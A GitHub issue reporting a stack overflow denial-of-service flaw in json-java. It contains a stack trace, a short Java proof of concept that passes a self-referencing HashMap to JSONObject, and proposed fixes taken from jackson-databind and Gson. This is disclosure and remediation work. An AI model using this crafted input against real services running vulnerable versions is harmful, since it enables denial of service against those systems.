Skip to content

Stack overflow error caused by json-java serialization Map #743

Closed
Closed
Stack overflow error caused by json-java serialization Map#743
@PoppingSnack

Description

@PoppingSnack
PoppingSnack
opened on Jun 8, 2023

Stack overflow error caused by json-java serialization Map

Description

json-java before v20230227 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at org.json.JSONObject.<init>(JSONObject.java:284)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)
	at org.json.JSONObject.wrap(JSONObject.java:2480)
	at org.json.JSONObject.wrap(JSONObject.java:2452)
	at org.json.JSONObject.<init>(JSONObject.java:291)

PoC

        <dependency>
            <groupId>org.json</groupId>
            <artifactId>json</artifactId>
            <version>20230227</version>
        </dependency>
import org.json.JSONObject;

import java.util.HashMap;

public class PoC2 {

    public static void main(String[] args) {
        HashMap<String,Object> map=new HashMap<>();
        map.put("t",map);
        JSONObject jsonObject = new JSONObject(map);
        String jsonString = jsonObject.toString();
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
  2. https://github.com/jettison-json/jettison/pull/53/files

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions